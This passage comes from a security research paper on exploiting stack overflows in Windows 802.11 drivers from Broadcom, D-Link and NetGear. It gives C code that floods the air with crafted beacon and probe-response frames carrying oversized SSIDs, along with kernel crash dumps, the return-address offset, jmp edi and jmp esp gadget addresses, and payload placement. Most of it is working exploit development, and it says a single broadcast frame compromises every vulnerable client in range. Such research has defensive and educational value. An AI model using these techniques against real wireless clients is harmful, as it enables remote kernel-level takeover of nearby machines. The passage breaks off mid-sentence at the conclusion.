device driver handled beacon packets. As a result of this tip, a simple program was written that generated beacon packets with overly sized SSIDs. The code that was used to do this is shown below: int main(int argc, char **argv) { Packet_80211 BeaconPacket; CreatePacketForExploit(BeaconPacket, basic_target); printf("Looping forever, sending packets.\n"); while(true) { int ret = Send80211Packet(&in_tx, BeaconPacket); usleep(cfg.usleep); if (ret == -1) { printf("Error tx'ing packet. Is interface up?\n"); exit(0); } } } void CreatePacketForExploit(Packet_80211 &P, struct target T) { Packet_80211_mgmt Beacon; u_int8_t bcast_addy[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; Packet_80211_mgmt_Crafter MgmtCrafter(bcast_addy, cfg.src, cfg.bssid); MgmtCrafter.craft(8, Beacon); // 8 = beacon P = Beacon; printf("\n"); if (T.payload_size > 255) { printf("invalid target. payload sizes > 255 wont fit in a single IE\n"); exit(0); } u_int8_t fixed_parameters[12] = { '_', ',', '.', 'j', 'c', '.', ',', '_', // timestamp (8 bytes) 0x64, 0x00, // beeacon interval, 1.1024 secs 0x11, 0x04 // capability information. ESS, WEP, Short slot time }; P.AppendData(sizeof(fixed_parameters), fixed_parameters); u_int8_t SSID_ie[257]; //255 + 2 for type, value u_int8_t *SSID = SSID_ie + 2; SSID_ie[0] = 0; SSID_ie[1] = 255; memset(SSID, 0x41, 255); //Okay, SSID IE is ready for appending. P.AppendData(sizeof(SSID_ie), SSID_ie); P.print_hex_dump(); } As a result of running this code, 802.11 beacon packets were produced that did indeed contain overly sized SSIDs. However, these packets appeared to have no effect on the BroadCom device driver. After considerable head scratching, a modification was made to the program to see if a normally sized SSID would cause the device driver to process it. If it were processed, it would mean that the fake SSID would show up in the list of available networks. Even after making this modification, the device driver still did not appear to be processing the manually crafted 802.11 beacon packets. Finally, it was realized that the driver might have some checks in place such that it would only process beacon packets from networks that also respond to 802.11 probes. To test this theory out, the code was changed in the manner shown below: CreatePacketForExploit(BeaconPacket, basic_target); //CreatePacket returns a beacon, we will also send out directd probe responses. Packet_80211 ProbePacket = BeaconPacket; ProbePacket.wlan_header->subtype = 5; //probe response. ProbePacket.setDstAddr(cfg.dst); ... while(true) { int ret = Send80211Packet(&in_tx, BeaconPacket); usleep(cfg.usleep); ret = Send80211Packet(&in_tx, ProbePacket); usleep(2*cfg.usleep); } Sending out directed probe responses as well as beacon packets caused results to be generated immediately. When a small SSID was sent, it would suddenly show up in the list of available wireless networks. When an overly sized SSID was sent, it resulted in a much desired bluescreen as a result of the stack overflow that Chris had identified. The following output shows some of the crash information associated with transmitting an SSID that consisted of 255 0xCC's: DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is usually caused by drivers using improper addresses. If kernel debugger is available get stack backtrace. Arguments: Arg1: ccccfe9d, memory referenced Arg2: 00000002, IRQL Arg3: 00000000, value 0 = read operation, 1 = write operation Arg4: f6e713de, address which referenced memory ... TRAP_FRAME: 80550004 -- (.trap ffffffff80550004) ErrCode = 00000000 eax=cccccccc ebx=84ce62ac ecx=00000000 edx=84ce62ac esi=805500e0 edi=84ce6308 eip=f6e713de esp=80550078 ebp=805500e0 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 bcmwl5+0xf3de: f6e713de f680d131000002 test byte ptr [eax+31D1h],2 ds:0023:ccccfe9d=?? ... kd> k v *** Stack trace for last set context - .thread/.cxr resets it ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 805500e0 cccccccc cccccccc cccccccc cccccccc bcmwl5+0xf3de 80550194 f76a9f09 850890fc 80558e80 80558c20 0xcccccccc 805501ac 804dbbd4 850890b4 850890a0 00000000 NDIS!ndisMDpcX+0x21 (FPO: [Non-Fpo]) 805501d0 804dbb4d 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 (FPO: [0,0,0]) 805501d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 (FPO: [0,0,0]) In this case, the crash occurred because a variable on the stack was overwritten that was subsequently used as a pointer. This overwritten pointer was then dereferenced. In this case, the dereference occurred through the eax register. Although the crash occurred as a result of the dereference, it's important to note that the return address for the stack frame was successfully overwritten with a controlled value of 0xcccccccc. If the function had been allowed to return cleanly without trying to dereference corrupted pointers, full control of the instruction pointer would have been obtained. In order to avoid this crash and gain full control of the instruction pointer, it's necessary to try to calculate the offset to the return address from the start of the buffer that is being transmitted. Figuring out this offset also has the benefit of making it possible to figure out the minimum number of bytes necessary to transmit to trigger the overflow. This is important because it may be useful when it comes to preventing the dereference crash that was seen previously. There are many different ways in which the offset of the return address can be determined. In this situation, the simplest way to go about it is to transmit a buffer that contains an incrementing array of bytes. For instance, byte index 0 is 0x00, byte index 1 is 0x01, and so on. The value that the return address is overwritten with will then make it possible to calculate its offset within the buffer. After transmitting a packet that makes use of this technique, the following crash is rendered: DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is usually caused by drivers using improper addresses. If kernel debugger is available get stack backtrace. Arguments: Arg1: 605f902e, memory referenced Arg2: 00000002, IRQL Arg3: 00000000, value 0 = read operation, 1 = write operation Arg4: f73673de, address which referenced memory ... STACK_TEXT: 80550004 f73673de badb0d00 84d8b250 80550084 nt!KiTrap0E+0x233 WARNING: Stack unwind information not available. Following frames may be wrong. 805500e0 5c5b5a59 605f5e5d 64636261 68676665 bcmwl5+0xf3de 80550194 f76a9f09 84e9e0fc 80558e80 80558c20 0x5c5b5a59 805501ac 804dbbd4 84e9e0b4 84e9e0a0 00000000 NDIS!ndisMDpcX+0x21 805501d0 804dbb4d 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 805501d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 From this stack trace, it can be seen that the return address was overwritten with 0x5c5b5a59. Since byte-ordering on x86 is little endian, the offset within the buffer that contains the SSID is 0x59. With knowledge of the offset at which the return address is overwritten, the next step becomes figuring out where in the buffer to place the arbitrary code that will be executed. Before going down this route, it's important to provide a little bit of background on the format of 802.11 Management packets. Management packets encode all of their information in what the standard calls Information Elements (IEs). IEs have a one byte identifier followed by a one byte length which is subsequently followed by the associated IE data. For those familiar with Type-Length-Value (TLV), IEs are roughly the same thing. Based on this definition, the largest possible IE is 257 bytes (2 bytes of overhead, and 255 bytes of data). The upshot of the size restrictions associated with an IE means that the largest possible SSID that can be copied to the stack is 255 bytes. When attempting to find the offset of the return address on the stack, an SSID IE was sent with a 255 byte SSID. Considering the fact that a stack overflow occurred, one might reasonably expect to find the entire 255 byte SSID on the stack as a result of the overflow that occurred. A quick dump of the stack can be used to validate this assumption: kd> db esp L 256 80550078 2e f0 d9 84 0c 80 d8 84-00 80 d8 84 00 07 0e 01 ................ 80550088 02 03 ff 00 01 02 03 04-05 06 07 08 09 0a 0b 0c ................ 80550098 0d 0e 0f 10 11 12 13 14-15 16 17 18 19 1a 1b 1c ................ 805500a8 1d 1e 1f 20 21 22 23 24-25 26 0b 28 0c 00 00 00 ... !"#$%&.(.... 805500b8 82 84 8b 96 24 30 48 6c-0c 12 18 60 44 00 55 80 ....$0Hl...`D.U. 805500c8 3d 3e 3f 40 41 42 43 44-45 46 01 02 01 02 4b 4c =>?@ABCDEF....KL 805500d8 4d 01 02 50 51 52 53 54-55 56 57 58 59 5a 5b 5c M..PQRSTUVWXYZ[\ 805500e8 5d 5e 5f 60 61 62 63 64-65 66 67 68 69 6a 6b 6c ]^_`abcdefghijkl 805500f8 6d 6e 6f 70 71 72 73 74-75 76 77 78 79 7a 7b 7c mnopqrstuvwxyz{| 80550108 7d 7e 7f 80 81 82 83 84-85 86 87 88 89 8a 8b 8c }~.............. 80550118 8d 8e 8f 90 91 92 93 94-95 96 97 98 99 9a 9b 9c ................ 80550128 9d 9e 9f a0 a1 a2 a3 a4-a5 a6 a7 a8 a9 aa ab ac ................ 80550138 ad ae af b0 b1 b2 b3 b4-b5 b6 b7 b8 b9 ba bb bc ................ 80550148 bd be bf c0 c1 c2 c3 c4-c5 c6 c7 c8 c9 ca cb cc ................ 80550158 cd ce cf d0 d1 d2 d3 d4-d5 d6 d7 d8 d9 da db dc ................ 80550168 dd de df e0 e1 e2 e3 e4-e5 e6 e7 e8 e9 ea eb ec ................ 80550178 ed ee ef f0 f1 f2 f3 f4-f5 f6 f7 f8 f9 fa fb fc ................ 80550188 fd fe e9 84 00 00 00 00-e0 9e 6a 01 ac 01 55 80 ..........j...U. Based on this dump, it appears that the majority of the SSID was indeed copied across the stack. However, a large portion of the buffer prior to the offset of the return address has been mangled. In this instance, the return address appears to be located at 0x805500e4. While the area prior to this address appears mangled, the area succeeding it has remained intact. In order to try to prove the possibility of gaining code execution, a good initial attempt would be to send a buffer that overwrites the return address with the address that immediately succeeds it (which will be composed of int3's). If everything works according to plan, the vulnerable function will return into the int3's and bluescreen the machine in a controlled fashion. This accomplishes two things. First, it proves that it is possible to redirect execution into a controllable buffer. Second, it gives a snapshot of the state of the registers at the time that execution control is redirected. The layout of the buffer that would need to be sent to trigger this condition is described in the diagram below: [Padding.......][EIP][payload of int3's] ^ ^ ^ | | \_ Can hold at most 163 bytes of arbitrary code. | \_ Overwritten with 0x8055010d which points to the payload \_ Start of SSID that is mangled after the overflow occurs. Transmitting a buffer that is structured as shown above does indeed result in a bluescreen. It is possible to differentiate actual crashes from those generated as the result of an int3 by looking at the bugcheck information. The use of an int3 will result in an unhandled kernel mode exception which is bugcheck code 0x8e. Furthermore, the exception code information associated with this (the first parameter of the exception) will be set to 0x80000003. Exception code 0x80000003 is used to indicate that the unhandled exception was associated with a trap instruction. This is generally a good indication that the arbitrary code you specified has executed. It's also very useful in situations where it is not possible to do remote kernel debugging and one must rely on strictly using crash dump analysis. KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e) This is a very common bugcheck. Usually the exception address pinpoints the driver/function that caused the problem. Always note this address as well as the link date of the driver/image that contains this address. Some common problems are exception code 0x80000003. This means a hard coded breakpoint or assertion was hit, but this system was booted /NODEBUG. This is not supposed to happen as developers should never have hardcoded breakpoints in retail code, but ... If this happens, make sure a debugger gets connected, and the system is booted /DEBUG. This will let us see why this breakpoint is happening. Arguments: Arg1: 80000003, The exception code that was not handled Arg2: 8055010d, The address that the exception occurred at Arg3: 80550088, Trap Frame Arg4: 00000000 ... TRAP_FRAME: 80550088 -- (.trap ffffffff80550088) ErrCode = 00000000 eax=8055010d ebx=841b0000 ecx=00000000 edx=841b31f4 esi=841b000c edi=845f302e eip=8055010e esp=805500fc ebp=8055010d iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 nt!KiDoubleFaultStack+0x2c8e: 8055010e cc int 3 ... STACK_TEXT: 8054fc50 8051d6a7 0000008e 80000003 8055010d nt!KeBugCheckEx+0x1b 80550018 804df235 80550034 00000000 80550088 nt!KiDispatchException+0x3b1 80550080 804df947 8055010d 8055010e badb0d00 nt!CommonDispatchException+0x4d 80550080 8055010e 8055010d 8055010e badb0d00 nt!KiTrap03+0xad 8055010d cccccccc cccccccc cccccccc cccccccc nt!KiDoubleFaultStack+0x2c8e WARNING: Frame IP not in any known module. Following frames may be wrong. 80550111 cccccccc cccccccc cccccccc cccccccc 0xcccccccc 80550115 cccccccc cccccccc cccccccc cccccccc 0xcccccccc 80550119 cccccccc cccccccc cccccccc cccccccc 0xcccccccc 8055011d cccccccc cccccccc cccccccc cccccccc 0xcccccccc The above crash dump information definitely shows that arbitrary code execution has been achieved. This is a big milestone. It pretty much proves that exploitation will be possible. However, it doesn't prove how reliable or portable it will be. For that reason, the next step involves identifying changes to the exploit that will make it more reliable and portable from one machine to the next. Fortunately, the current situation already appears like it might afford a good degree of portability, as the stack addresses don't appear to shift around from one crash to the next. At this stage, the return address is being overwritten with a hard-coded stack address that points immediately after the return address in the buffer. One of the problems with this is that the amount of space immediately following the return address is limited to 163 bytes due to the maximum size of the SSID IE. This is enough room for small stub of a payload, but probably not large enough for a payload that would provide anything interesting in terms of features. It's also worth noting that overwriting past the return address might overwrite some important elements on the stack that could lead to the system crashing at some later point for hard to explain reasons. When dealing with kernel-mode vulnerabilities, it is advised that one attempt to clobber the least amount of state as possible in order to reduce the amount of collateral damage that might ensue. Limiting the amount of data that is used in the overflow to only the amount needed to trigger the overwriting of the return address means that the total size for the SSID IE will be limited and not suitable to hold arbitrary code. However, there's no reason why code couldn't be placed in a completely separate IE unrelated to the SSID. This means we could transmit a packet that included both the bogus SSID IE and another arbitrary IE which would be used to contain the arbitrary code. Although this would work, it must be possible to find a reference to the arbitrary IE that contains the arbitrary code. One approach that might be taken to do this would be to search the address space for an intact copy of the 802.11 packet that is transmitted. Before going down that path, it makes sense to try to find instances of the packet in memory using the kernel debugger. A simple search of the address space using the destination MAC address of the packet sent is a good way to find potential matches. In this case, the destination MAC is 00:14:a5:06:8f:e6. kd> .ignore_missing_pages 1 Suppress kernel summary dump missing page error message kd> s 0x80000000 L?10000000 00 14 a5 06 8f e6 8418588a 00 14 a5 06 8f e6 ff ff-ff ff ff ff 40 0e 00 00 ............@... 841b0006 00 14 a5 06 8f e6 00 00-00 00 00 00 00 00 00 00 ................ 841b1534 00 14 a5 06 8f e6 00 00-00 00 00 00 00 00 00 00 ................ 84223028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845dc028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845de828 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845df828 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845f3028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845f3828 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845f4028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 845f5028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 84642d4c 00 14 a5 06 8f e6 00 00-f0 c6 2a 85 00 00 00 00 ..........*..... 846d6d4c 00 14 a5 06 8f e6 00 00-80 79 21 85 00 00 00 00 .........y!..... 84eda06c 00 14 a5 06 8f e6 02 06-01 01 00 0e 00 00 00 00 ................ 84efdecc 00 14 a5 06 8f e6 00 00-65 00 00 00 16 00 25 0a ........e.....%. The above output shows that quite a few matches were found One important thing to note is that the BSSID used in the packet that contained the overly sized SSID was 00:07:0e:01:02:03. In an 802.11 header, the addresses of Management packets are arranged in order of DST, SRC, BSSID. While some of the above matches do not appear to contain the entire packet contents, many of them do. Picking one of the matches at random shows the contents in more detail: kd> db 84223028 L 128 84223028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ 84223038 02 03 d0 cf 85 b1 b3 db-01 00 00 00 64 00 11 04 ............d... 84223048 00 ff 4a 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d ..J..U...U...U.. 84223058 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. 84223068 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. 84223078 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. 84223088 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. 84223098 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. 842230a8 01 55 80 cc cc cc cc cc-cc cc cc cc cc cc cc cc .U.............. 842230b8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ 842230c8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ 842230d8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ 842230e8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ 842230f8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ 84223108 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ Indeed, this does appear to be a full copy of the original packet. The reason why there are so many copies of the packet in memory might be related to the fact that the current form of the exploit is transmitting packets in an infinite loop, thus causing the driver to have a few copies lingering in memory. The fact that multiple copies exist in memory is good news considering it increases the number of places that could be used for return addresses. However, it's not as simple as hard-coding one of these addresses into the exploit considering pool allocated addresses will not be predictable. Instead, steps will need to be taken to attempt to find a reference to the packet through a register or through some other context. In this way, a very small stub could be placed after the return address in the buffer that would immediately transfer control into the a copy of the packet somewhere else in memory. Although some initial work with the debugger showed a couple of references to the original packet on the stack, a much simpler solution was identified. Consider the following register context at the time of the crash: kd> r Last set context: eax=8055010d ebx=841b0000 ecx=00000000 edx=841b31f4 esi=841b000c edi=845f302e eip=8055010e esp=805500fc ebp=8055010d iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 nt!KiDoubleFaultStack+0x2c8e: 8055010e cc int 3 Inspecting each of these registers individually eventually shows that the edi register is pointing into a copy of the packet. kd> db edi 845f302e 00 07 0e 01 02 03 00 07-0e 01 02 03 10 cf 85 b1 ................ 845f303e b3 db 01 00 00 00 64 00-11 04 00 ff 4a 0d 01 55 ......d.....J..U 845f304e 80 0d 01 55 80 0d 01 55-80 0d 01 55 80 0d 01 55 ...U...U...U...U As chance would have it, edi is pointing to the source MAC in the 802.11 packet that was sent. If it had instead been pointing to the destination MAC or the end of the packet, it would not have been of any use. With edi being pointed to the source MAC, the rest of the cards fall into place. The hard-coded stack address that was previously used to overwrite the return address can be replaced with an address (probably inside ntoskrnl.exe) that contains the equivalent of a jmp edi instruction. When the exploit is triggered and the vulnerable function returns, it will transfer control to the location that contains the jmp edi. The jmp edi, in turn, transfers control to the first byte of the source MAC. By setting the source MAC to some executable code, such as a relative jump instruction, it is possible to finally transfer control into a location of the packet that contains the arbitrary code that should be executed. This solves the problem of using the hard-coded stack address as the return address and should help to make the exploit more reliable and portable between targets. However, this portability will be limited by the location of the jmp edi instruction that is used when overwriting the return address. Finding the location of a jmp edi instruction is relatively simple, although more effective measures could be use to cross-reference addresses in an effort to find something more portable Experimentation shows that 0x8066662c is a reliable location: kd> s nt L?10000000 ff e7 8063abce ff e7 ff 21 47 70 21 83-98 03 00 00 eb 38 80 3d ...!Gp!......8.= 806590ca ff e7 ff 5f eb 05 bb 22-00 00 c0 8b ce e8 74 ff ..._..."......t. 806590d9 ff e7 ff 5e 8b c3 5b c9-c2 08 00 cc cc cc cc cc ...^..[......... 8066662c ff e7 ff 8b d8 85 db 74-e0 33 d2 42 8b cb e8 d7 .......t.3.B.... 806bb44b ff e7 a3 6c ff a2 42 08-ff 3f 2a 1e f0 04 04 04 ...l..B..?*..... ... With the exploit all but finished, the final question that remains unanswered is where the arbitrary code should be placed in the 802.11 packet. There are a few different ways that this could be tackled. The simplest solution to the problem would be to simply append the arbitrary code immediately after the SSID in the packet. However, this would make the packet malformed and might cause the driver to drop it. Alternatively, an arbitrary IE, such as a WPA IE, could be used as a container for the arbitrary code as suggested earlier in this section. For now, the authors decided to take the middle road. By default, a WPA IE will be used as the container for all payloads, regardless of whether or not the payloads fit within the IE. This has the effect of allowing all payloads smaller than 256 bytes to be part of a well-formed packet. Payloads that are larger than 255 bytes will cause the packet to be malformed, but perhaps not enough to cause the driver to drop the packet. An alternate solution to this issue can be found in the NetGear case study. At this point, the structure of the buffer and the packet as a whole have been completely researched and are ready to be tested. The only thing left to do is incorporate the arbitrary code that was described in 4.1. Much time was spent debugging and improving the code that was used in order to produce a reliable exploit. 5.2) D-Link Soon after the Broadcom exploit was completed, the authors decided to write a suite of fuzzing modules that could discover similar issues in other wireless drivers. The first casualty of this process was the A5AGU.SYS driver provided with the D-Link's DWL-G132 USB wireless adapter. The authors configured the test machine (Windows XP SP2) so that a complete snapshot of kernel memory was included in the system crash dumps. This ensures that when a crash occurs, enough useful information is there to debug the problem. Next, the latest driver for the target device (v1.0.1.41) was installed. Finally, the beacon fuzzing module was started and the card was inserted into the USB port of the test system. Five seconds later, a beautiful blue screen appeared while the crash dump was written to disk. DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is usually caused by drivers using improper addresses. If kernel debugger is available get stack backtrace. Arguments: Arg1: 56149a1b, memory referenced Arg2: 00000002, IRQL Arg3: 00000000, value 0 = read operation, 1 = write operation Arg4: 56149a1b, address which referenced memory ErrCode = 00000000 eax=00000000 ebx=82103ce0 ecx=00000002 edx=82864dd0 esi=f24105dc edi=8263b7a6 eip=56149a1b esp=80550658 ebp=82015000 iopl=0 nv up ei ng nz ac pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 56149a1b ?? ??? Resetting default scope LAST_CONTROL_TRANSFER: from 56149a1b to 804e2158 FAILED_INSTRUCTION_ADDRESS: +56149a1b 56149a1b ?? ??? STACK_TEXT: 805505e4 56149a1b badb0d00 82864dd0 00000000 nt!KiTrap0E+0x233 80550654 82015000 82103ce0 81f15e10 8263b79c 0x56149a1b 80550664 f2408d54 81f15e10 82103c00 82015000 0x82015000 80550694 f24019cc 82015000 82103ce0 82015000 A5AGU+0x28d54 805506b8 f2413540 824ff008 0000000b 82015000 A5AGU+0x219cc 805506d8 f2414fae 824ff008 0000000b 0000000c A5AGU+0x33540 805506f4 f24146ae f241d328 8263b760 81f75000 A5AGU+0x34fae 80550704 f2417197 824ff008 00000001 8263b760 A5AGU+0x346ae 80550728 804e42cc 00000000 821f0008 00000000 A5AGU+0x37197 80550758 f74acee5 821f0008 822650a8 829fb028 nt!IopfCompleteRequest+0xa2 805507c0 f74adb57 8295a258 00000000 829fb7d8 USBPORT!USBPORT_CompleteTransfer+0x373 805507f0 f74ae754 026e6f44 829fb0e0 829fb0e0 USBPORT!USBPORT_DoneTransfer+0x137 80550828 f74aff6a 829fb028 804e3579 829fb230 USBPORT!USBPORT_FlushDoneTransferList+0x16c 80550854 f74bdfb0 829fb028 804e3579 829fb028 USBPORT!USBPORT_DpcWorker+0x224 80550890 f74be128 829fb028 00000001 80559580 USBPORT!USBPORT_IsrDpcWorker+0x37e 805508ac 804dc179 829fb64c 6b755044 00000000 USBPORT!USBPORT_IsrDpc+0x166 805508d0 804dc0ed 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 805508d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 Five seconds of fuzzing had produced a flaw that made it possible to gain control of the instruction pointer. In order to execute arbitrary code, however, a contextual reference to the malicious frame had to be located. In this case, the edi register pointed into the source address field of the frame in just the same way that it did in the Broadcom vulnerability. The bogus eip value can be found just past the source address where one would expect it -- inside one of the randomly generated information elements. kd> dd 0x8263b7a6 (edi) 8263b7a6 f3793ee8 3ee8a34e a34ef379 6eb215f0 8263b7b6 fde19019 006431d8 9b001740 63594364 kd> s 0x8263b7a6 Lffff 0x1b 0x9a 0x14 0x56 8263bd2b 1b 9a 14 56 2a 85 56 63-00 55 0c 0f 63 6e 17 51 ...V*.Vc.U..cn.Q The next step was to determine what information element was causing the crash. After decoding the in-memory version of the frame, a series of modifications and retransmissions were made until the specific information element leading to the crash was found. Through this method it was determined that a long Supported Rates information element triggers the stack overflow shown in the crash above. Exploiting this flaw involved finding a return address in memory that pointed to a jmp edi, call edi, or push edi; ret instruction sequence. This was accomplished by running the msfpescan application included with the Metasploit Framework against the ntoskrnl.exe of our target. The resulting addresses had to be adjusted to account for the kernel's base address. The address that was chosen for this version of ntoskrnl.exe was 0x804f16eb ( 0x800d7000 + 0x0041a6eb ). $ msfpescan ntoskrnl.exe -j edi [ntoskrnl.exe] 0x0040365d push edi; retn 0x0001 0x00405aab call edi 0x00409d56 push edi; ret 0x0041a6eb jmp edi Finally, the magic frame was reworked into an exploit module for the 3.0 version of the Metasploit Framework. When the exploit is launched, a stack overflow occurs, the return address is overwritten with the location of a jmp edi, which in turn lands on the source address of the frame. The source address was modified to be a valid x86 relative jump, which directs execution into the body of the first information element. The maximum MTU of 802.11b is over 2300 bytes, allowing for payloads of up to 1000 bytes without running into reliability issues. Since this exploit is sent to the broadcast address, all vulnerable clients within range of the attacker are exploited with a single frame. 5.3) NetGear For the next test, the authors chose NetGear's WG111v2 USB wireless adapter. The machine used in the D-Link exploit was reused for this test (Windows XP SP2). The latest version of the WG111v2.SYS driver (v5.1213.6.316) was installed, the beacon fuzzer was started, and the adapter was connected to the test system. After about ten seconds, the system crashed and another gorgeous blue screen appeared. DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high. This is usually caused by drivers using improper addresses. If kernel debugger is available get stack backtrace. Arguments: Arg1: dfa6e83c, memory referenced Arg2: 00000002, IRQL Arg3: 00000000, value 0 = read operation, 1 = write operation Arg4: dfa6e83c, address which referenced memory ErrCode = 00000000 eax=80550000 ebx=825c700c ecx=00000005 edx=f30e0000 esi=82615000 edi=825c7012 eip=dfa6e83c esp=80550684 ebp=b90ddf78 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 dfa6e83c ?? ??? Resetting default scope LAST_CONTROL_TRANSFER: from dfa6e83c to 804e2158 FAILED_INSTRUCTION_ADDRESS: +ffffffffdfa6e83c dfa6e83c ?? ??? STACK_TEXT: 80550610 dfa6e83c badb0d00 f30e0000 0b9e1a2b nt!KiTrap0E+0x233 WARNING: Frame IP not in any known module. Following frames may be wrong. 80550680 79e1538d 14c4f76f 8c1cec8e ea20f5b9 0xdfa6e83c 80550684 14c4f76f 8c1cec8e ea20f5b9 63a92305 0x79e1538d 80550688 8c1cec8e ea20f5b9 63a92305 115cab0c 0x14c4f76f 8055068c ea20f5b9 63a92305 115cab0c c63e58cc 0x8c1cec8e 80550690 63a92305 115cab0c c63e58cc 6d90e221 0xea20f5b9 80550694 115cab0c c63e58cc 6d90e221 78d94283 0x63a92305 80550698 c63e58cc 6d90e221 78d94283 2b828309 0x115cab0c 8055069c 6d90e221 78d94283 2b828309 39d51a89 0xc63e58cc 805506a0 78d94283 2b828309 39d51a89 0f8524ea 0x6d90e221 805506a4 2b828309 39d51a89 0f8524ea c8f0583a 0x78d94283 805506a8 39d51a89 0f8524ea c8f0583a 7e98cd49 0x2b828309 805506ac 0f8524ea c8f0583a 7e98cd49 214b52ab 0x39d51a89 805506b0 c8f0583a 7e98cd49 214b52ab 139ef137 0xf8524ea 805506b4 7e98cd49 214b52ab 139ef137 a7693fa7 0xc8f0583a 805506b8 214b52ab 139ef137 a7693fa7 dfad502f 0x7e98cd49 805506bc 139ef137 a7693fa7 dfad502f 81212de6 0x214b52ab 805506c0 a7693fa7 dfad502f 81212de6 c46a3b2e 0x139ef137 805507c0 f74a1b57 825f1e40 00000000 829a87d8 0xa7693fa7 805507f0 f74a2754 026e6f44 829a80e0 829a80e0 USBPORT!USBPORT_DoneTransfer+0x137 80550828 f74a3f6a 829a8028 804e3579 829a8230 USBPORT!USBPORT_FlushDoneTransferList+0x16c 80550854 f74b1fb0 829a8028 804e3579 829a8028 USBPORT!USBPORT_DpcWorker+0x224 80550890 f74b2128 829a8028 00000001 80559580 USBPORT!USBPORT_IsrDpcWorker+0x37e 805508ac 804dc179 829a864c 6b755044 00000000 USBPORT!USBPORT_IsrDpc+0x166 805508d0 804dc0ed 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 805508d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 The crash indicates that not only did the fuzzer gain control of the driver's execution address, but the entire stack frame was smashed as well. The esp register points about a thousand bytes into the frame and the bogus eip value inside another controlled area. kd> dd 80550684 80550684 79e1538d 14c4f76f 8c1cec8e ea20f5b9 80550694 63a92305 115cab0c c63e58cc 6d90e221 kd> s 0x80550600 Lffff 0x3c 0xe8 0xa6 0xdf 80550608 3c e8 a6 df 10 06 55 80-78 df 0d b9 3c e8 a6 df <.....U.x...<... 80550614 3c e8 a6 df 00 0d db ba-00 00 0e f3 2b 1a 9e 0b <...........+... 80550678 3c e8 a6 df 08 00 00 00-46 02 01 00 8d 53 e1 79 <.......F....S.y 8055a524 3c e8 a6 df 02 00 00 00-00 00 00 00 3c e8 a6 df <...........<... 8055a530 3c e8 a6 df 00 40 00 e1-00 00 00 00 00 00 00 00 <....@.......... Analyzing this bug took a lot more time than one might expect. Suprisingly, there is no single field or information element that triggers this flaw. Any series of information elements with a length greater than 1100 bytes will trigger the overflow if the SSID, Supported Rates, and Channel information elements are at the beginning. The driver will discard any frames where the IE chain is truncated or extends beyond the boundaries of the received frame. This was an annoyance, since a payload may be of arbitrary length and content and may not neatly fit into a 255 byte block of data (the maximum for a single IE). The solution was to treat the blob of padding and shellcode like a contiguous IE chain and pad the buffer based on the content and length of the frame. The exploit code would generate the buffer, then walk through the buffer as if it was a series of IEs, extending the very last IE via randomized padding. This results in a chain of garbage information elements which pass the driver's sanity checks and allows for clean exploitation. For this bug, the esp register was the only one pointing into controlled data. This introduced another problem -- before the vulnerable function returned, it modified stack variables and left parts of the frame corrupted. Although the area pointed to by esp was stable, a corrupted block exists just beyond it. To solve this, a tiny block of assembly code was added to the exploit that, when executed, would jump to the real payload by calculating an offset from the eax register. Finding a jmp esp instruction was as simple as running msfpescan on ntoskrnl.exe and adjusting it for the kernel base address. The address that was chosen for this version of ntoskrnl.exe was 0x804ed5cb (0x800d7000 + 0x004165cb). $ msfpescan ntoskrnl.exe -j esp [ntoskrnl.exe] 0x004165cb jmp esp 6) Conclusion Technology that can be used to help prevent the exploitation of user-mode 